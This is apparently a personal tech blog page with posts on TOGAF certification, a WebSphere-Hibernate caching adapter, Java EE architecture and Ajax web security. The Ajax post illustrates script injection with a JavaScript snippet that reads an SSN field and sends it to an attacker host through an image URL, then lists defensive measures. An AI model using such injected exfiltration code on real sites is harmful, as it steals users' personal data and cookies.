For more detail, click on http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html link.
Gaurav Tripathi's Blog
Tuesday, May 01, 2012
Gelling Security Architecture with TOGAF
For more detail, click on http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html link.
Thursday, February 23, 2012
Preparing TOGAF 9 Certification
For Part 1:
- Read the TOGAF 9 documentation
- Focus on input & output of each ADM Phases (specially Phase E & F)
- High level knowledge of steps involved in each ADM Phases
- Technical Reference Model
- Repository
Part - 2 (though it's a open book) is bit tougher than Part - 1 as it is having scenario questions. Below are topics/section which you should focus:
- Read the TOGAF 9 documentation
- Focus on input & output of each ADM Phases
- In-depth knowledge of steps involved in each ADM Phases
- Artifacts (catalog, matrices & diagrams) involved in each phases(specially B,C & D)
- Also read the mapping of security architecture with TOGAF
- Iterative processes & guidelines
Tuesday, August 02, 2011
SOA with TOGAF
Monday, July 04, 2011
Guide to clear SCEA (OCMJEA) Part 2 & 3
Tuesday, December 21, 2010
WebSphere's DynaCache Hibernate Caching Adapter
As WebSphere Application Server (especially 6.x) onwards, it supports JPA (Java Persistence APIs). Its default ORM tool is OpenJPA. It also supports easy plugging with other ORM tools. For distributed caching, WAS (WebSphere? Application Server) uses DynaCache for distributed caching and very useful in clustered environment. As it has pluggable caching architecture so any ORM tool can easily gets plugged with the ORM caching adapter.
As Hibernate is very famous and stable ORM tool. But it has an issues with WAS as it doesn't have a Hibernate caching adapter to plug with IBM's distributed caching framework.
So I decided to make WebSphere-Hibernate DynaCache adapter so that anyone can easily use the renowned Hibernate ORM.
Please visit my project at http://code.google.com/p/webspherehibernateadapter/ for more detail.
Monday, December 06, 2010
High Scalable and Distributed Architecture
In an Enterprise world, Spring Framework with some standard ORM tool like Hibernate gained considerable acceptance as a light-weight architecture for mid size applications. Also in Java EE 5 specification, major changes has been done on component architecture, tried overcome the gaps like IoC, ORM etc.
Concept of IoC is still immature in the Java EE 5 and the flexibility, AOP, and relative strengths of Spring and ORM tool like Hibernate to further improve the productivity and quality of any web based applications. As JPA (part of Java EE 5) specification suggest pluggable design so we can use any ORM tool (compatible of JPA) in any application server like IBM WebSphere uses Apache OpenJPA as a default provider but Hibernate can easily be pluggable.
This article demonstrates how to build a highly scalable application with hybrid technology like EJB 3.0, Spring 3.0.x, and Hibernate. Also Spring Framework has its own remoting APIs and options but EJB is a standard specification and can easily be migrated across the application servers.
By designing a flexible and component architecture, the application will use the power of EJB 3.0, IoC & APO of Spring 3.0.x and ORM capability of Hibernate.
For more detail, visit my published article on theserverside website.
Sunday, September 05, 2010
Ajax and Web Application Security
- HTML or XHTML: It provide standards for displaying content display
- Cascading Style Sheet (CSS): It also provide standards for displaying content display
- JavaScript: It is a scripting language used for client side browser based applications
- Document Object Model (DOM): It is a standard object model used for displaying dynamic content and related interaction.
- XML and XSLT: It has a capability to manipulate, exchange and transferred data between client and server.
- XML HTML Request (XMLHttpRequest): This client side JavaScript API used for HTTP connect to server and exchange information. Information can be plain text, XML or JSON.
- JavaScript Object Notation (JSON): It is a lightweight, text-based and language independent data exchange format between client and server.
- User generates an event or some asynchronous event fire at client end and result a JavaScript call
- XMLHttpRequest JavaScript object request is created and configured with a request parameter along with event component identifier and user defined values (if any).
- Above object makes a asynchronous call to web / application server. Call may be web-service, servlet, JSF's AJAX component etc.
- Based on request, server may fetch the desired data from data store.
- That data push back to client browser in form of plain text, XML or JSON.
- XMLHttpRequest callback method received the data, processes it and updated the HTTP DOM representing the web-page with new information.
- Hacking Password and Cookies: Hacker can easily manipulate the sensitive information like password, cookies etc by injecting scripts in any part of DOM tree like:
function hackdata() {var data = document.getElementById("ssn").value;document.image[0].src = "http://hackdata.com/hackdata=" + data;}document.getElementById("button").onclick = hackdata;
Above example shows how hacker can steal the sensitive information.As soon as user clicks on submit button, a asynchronous request goes to hacker site with sensitive information. With the same approach, hacker can hack the cookies information.
- Hacking keyboard events: Through key logger or mouse sniffer sensitive information can be captured like:
- Inserting information: Attacker can modify the stylesheet to eliminate sensitive information such as making font color to white.
- Data Validation: To avoid XSS (Cross Site Scripting), web application must do the input data validation. Input validation and filter out possible active and malicious content from untrusted input source.
- Avoid Dynamic code generation & execution: Try to avoid dynamic code generation such as usage of eval method
- Secure use of JSON: As JSON is subset of JavaScript so it may contain malicious code such as many JavaScript libraries use the eval() method to convert JSON into JavaScript objects. To avoid that use the regular expression defined in RFC 4627 to make sure that JSON doesn't have malicious code.
- Use if "iFrame": Load the different domain data into iframe, which gives the advantage of JavaScript execution context & DOM tree its own. This prevents hacker from hacking from main page.
- Use security testing tool: Always use vulnerability checking tool to detect the potential vulnerabilities in advance.